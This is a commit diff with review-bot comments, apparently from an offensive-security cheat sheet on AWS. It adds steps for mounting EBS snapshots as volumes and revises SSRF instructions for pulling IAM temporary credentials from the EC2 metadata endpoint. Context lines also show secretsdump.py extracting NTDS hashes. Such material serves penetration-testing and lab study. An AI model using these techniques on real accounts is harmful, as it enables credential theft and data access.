EC2 Snapshots
parent 978e8b336b
commit 255aaec399
|
@ -73,6 +73,31 @@ aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west
|
||||||
14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
|
14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
|
||||||
|
|
||||||
|
|
||||||
|
## Access Snapshots
|
||||||
|
|
||||||
|
1. Get the `owner-id`
|
||||||
|
```powershell
|
||||||
|
$ aws --profile flaws sts get-caller-identity
|
||||||
|
"Account": "XXXX26262029",
|
||||||
|
```
|
||||||
|
2. List snapshots
|
||||||
|
```powershell
|
||||||
|
$ aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2
|
||||||
|
"SnapshotId": "snap-XXXX342abd1bdcb89",
|
||||||
|
```
|
||||||
|
3. Create a volume using the previously obtained `snapshotId`
|
||||||
|
```powershell
|
||||||
|
$ aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-XXXX342abd1bdcb89
|
||||||
|
```
|
||||||
|
4. In AWS console, deploy a new EC2 Ubuntu based, attach the volume and then mount it on the machine.
|
||||||
|
```ps1
|
||||||
|
$ ssh -i YOUR_KEY.pem ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com
|
||||||
|
$ lsblk
|
||||||
|
$ sudo file -s /dev/xvda1
|
||||||
|
$ sudo mount /dev/xvda1 /mnt
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Instance Connect
|
## Instance Connect
|
||||||
|
|
||||||
Push an SSH key to EC2 instance
|
Push an SSH key to EC2 instance
|
||||||
|
|
|
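Review bot: the new "Access Snapshots" steps disagree on region. Step 3 creates the volume in `us-west-2a`, but the step 4 SSH example connects to a host under `us-east-2.compute.amazonaws.com`. An EBS volume can only be attached to an instance in the same Availability Zone, so step 4 should say the instance has to be launched in `us-west-2a` and the example hostname should match. Steps 1 and 2 use `--profile flaws` while step 3 switches to `--profile swk` with no explanation; state which account each profile refers to, or use a neutral placeholder. Step 4 runs `lsblk` and then hard-codes `/dev/xvda1`; the text should say to use the device that `lsblk` reports for the attached volume. The fences are tagged `powershell` and `ps1` although they contain shell prompts and Linux commands, so pick one tag that fits. Step 4 also reads better as "deploy a new Ubuntu-based EC2 instance".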
@ -15,9 +15,9 @@ curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta
|
||||||
|
|
||||||
## Method for Elastic Cloud Compute (EC2)
|
## Method for Elastic Cloud Compute (EC2)
|
||||||
|
|
||||||
Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
|
Amazon provides an internal service that allows every EC2 instance to query and retrieve metadata about the host. If you discover an SSRF vulnerability running on an EC2 instance, try to fetch the content from 169.254.169.254.
|
||||||
|
|
||||||
1. Access the IAM : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/
|
1. Access the IAM : [http://169.254.169.254/latest/meta-data/](http://169.254.169.254/latest/meta-data/)
|
||||||
```powershell
|
```powershell
|
||||||
ami-id
|
ami-id
|
||||||
ami-launch-index
|
ami-launch-index
|
||||||
|
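Review bot: the step 1 label "Access the IAM" does not match what the step fetches. The URL is the metadata root `/latest/meta-data/` and the listing below it shows `ami-id` and `ami-launch-index`, not IAM data; something like "List the metadata root" would be accurate. Wrapping `http://169.254.169.254/...` in a markdown link makes a clickable link to a link-local address that only resolves from the instance itself, so a code span would serve readers better. The hunk header shows the section above already uses the `X-aws-ec2-metadata-token` header, and the new paragraph should say whether the plain URLs that follow assume the token is not required. The phrase "an SSRF vulnerability running on an EC2 instance" should read "an SSRF vulnerability in an application running on an EC2 instance".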
@ -30,8 +30,8 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me
|
||||||
instance-action
|
instance-action
|
||||||
instance-id
|
instance-id
|
||||||
```
|
```
|
||||||
2. Find the name of the role assigned to the instance : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/
|
2. Find the name of the role assigned to the instance : [http://169.254.169.254/latest/meta-data/iam/security-credentials/](http://169.254.169.254/latest/meta-data/iam/security-credentials/)
|
||||||
3. Extract the role's temporary keys : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
|
3. Extract the role's temporary keys : [http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM_USER_ROLE_HERE>/](http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM_USER_ROLE_HERE>/)
|
||||||
```powershell
|
```powershell
|
||||||
{
|
{
|
||||||
"Code" : "Success",
|
"Code" : "Success",
|
||||||
|
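Review bot: in step 3 the placeholder `<IAM_USER_ROLE_HERE>` sits inside both the link text and the link destination. Angle brackets there can be treated as HTML or break the link in some markdown renderers, and the resulting link cannot be followed anyway; a code span such as `http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE_NAME>/` avoids both problems. The placeholder name also mixes "user" and "role", while step 2 says the value is "the name of the role assigned to the instance", so the placeholder should name the role only.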
@ -69,7 +69,7 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me
|
||||||
|
|
||||||
## AWS API calls that return credentials
|
## AWS API calls that return credentials
|
||||||
|
|
||||||
- chime:createapikey
|
- [chime:createapikey](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonchime.html)
|
||||||
- [codepipeline:pollforjobs](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html)
|
- [codepipeline:pollforjobs](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html)
|
||||||
- [cognito-identity:getopenidtoken](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdToken.html)
|
- [cognito-identity:getopenidtoken](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdToken.html)
|
||||||
- [cognito-identity:getopenidtokenfordeveloperidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdTokenForDeveloperIdentity.html)
|
- [cognito-identity:getopenidtokenfordeveloperidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdTokenForDeveloperIdentity.html)
|
||||||
|
|
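Review bot: the new link for `chime:createapikey` points to the service-authorization page for the whole Amazon Chime service (`list_amazonchime.html`), while the neighbouring entries link to the API reference page of the specific action (`API_PollForJobs.html`, `API_GetOpenIdToken.html`). If no per-action page exists for this call, a short note saying so would explain the difference; otherwise link to the action's own page to keep the list consistent.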